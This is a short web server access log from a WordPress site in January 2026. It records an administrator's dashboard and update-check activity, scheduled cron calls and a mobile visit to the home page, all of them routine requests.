14.108.233.156 - - [14/Jan/2026:17:30:33 +0800] "GET /wp-admin/load-styles.php?c=0&dir=ltr&load%5Bchunk_0%5D=dashicons,admin-bar,common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,wp-pointer,widgets&load%5Bchunk_1%5D=,site-icon,l10n,buttons,media-views,wp-color-picker,editor-buttons,wp-components,wp-commands&ver=6.9 HTTP/1.1" 200 131057 "http://cqqizhou.com/wp-admin/update-core.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
36.133.115.36 - - [14/Jan/2026:17:30:46 +0800] "POST /wp-cron.php?doing_wp_cron=1768383046.6993420124053955078125 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
14.108.233.156 - - [14/Jan/2026:17:30:46 +0800] "GET /wp-admin/update-core.php?force-check=1 HTTP/1.1" 200 74427 "http://cqqizhou.com/wp-admin/update-core.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
14.108.233.156 - - [14/Jan/2026:17:30:52 +0800] "GET /wp-admin/index.php HTTP/1.1" 200 83327 "http://cqqizhou.com/wp-admin/update-core.php?force-check=1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
36.133.115.36 - - [14/Jan/2026:17:31:53 +0800] "POST /wp-cron.php?doing_wp_cron=1768383113.0912261009216308593750 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
14.108.233.156 - - [14/Jan/2026:17:31:53 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 78 "http://cqqizhou.com/wp-admin/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
14.108.233.156 - - [14/Jan/2026:17:32:58 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 78 "http://cqqizhou.com/wp-admin/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
14.108.233.156 - - [14/Jan/2026:17:33:24 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 47 "http://cqqizhou.com/wp-admin/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
125.94.144.102 - - [14/Jan/2026:17:33:26 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
14.108.233.156 - - [14/Jan/2026:17:33:26 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 47 "http://cqqizhou.com/wp-admin/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
14.108.233.156 - - [14/Jan/2026:17:33:28 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 47 "http://cqqizhou.com/wp-admin/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
125.94.144.102 - - [14/Jan/2026:17:33:30 +0800] "GET / HTTP/1.1" 200 34765 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
14.108.233.156 - - [14/Jan/2026:17:33:31 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 47 "http://cqqizhou.com/wp-admin/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
14.108.233.156 - - [14/Jan/2026:17:33:32 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 32 "http://cqqizhou.com/wp-admin/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
